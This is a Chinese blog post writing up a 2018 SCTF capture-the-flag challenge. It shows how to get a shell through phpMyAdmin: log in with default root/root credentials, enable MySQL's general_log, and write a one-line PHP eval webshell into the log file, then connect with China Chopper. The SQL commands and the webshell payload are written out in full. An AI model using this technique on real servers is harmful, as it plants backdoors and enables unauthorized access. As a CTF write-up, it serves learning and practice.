http://218.245.4.98:20000/phpmyadmin:2018SCTF--easiest web - phpmyadmin

  SCTF的web最简单题,好难好难好难。
  
  直接进去就是PHPmyadmin界面(即mysql的网页界面),需要登录密码,这个我当时没有破解出来,谁知道账号密码是root/root咩,要是当时账号密码同时破,或许就很好了。
  进入后,可见,,,,,,,啊啊啊,登不进去了,是的,有人改密码,继续。进入后,就看见了一句话木马,参赛选手做了这项操作。一般数据库方面的就是使一句话木马存在于某个文件中,然后用中国菜刀连接即可登录服务器,寻找各种秘密信息,这就是phpmyadmin的getshell方法。本题就是这样。如下图所示

 

  那首先,要想办法找出存储这些信息的数据文件。关键是general_log,它会启动跟踪SQL的执行记录的开关,emmmmmm
 
1.设置general_log
  查找此字段,语句为:
show variables like 'general_log';
  如果它是关闭的,如下图

 

  启动它即可,命令为:
set global general_log=on;
  查看结果(show VARIABLES like 'general_log';)如下。

 

  启动之后,就可以愉快地设置它的记录文件了,这里用到关键词general_log_file。
 
2.设置general_log_file
  此字段设置执行语句记录的输出文件。查看一下子它现在的文件指向。
show variables like 'general_log_file';

 

  
 
  OK,随便输入包含一句话木马的执行语句。
select '<?php @eval($_POST[wz]) ?>';
  用中国菜刀连接即可,在C盘看到flag.txt,打开即愉快地结束-。-
 
 
 
 

posted on 2019-01-21 09:56  HYWZ  阅读(288)  评论(0编辑  收藏  举报

导航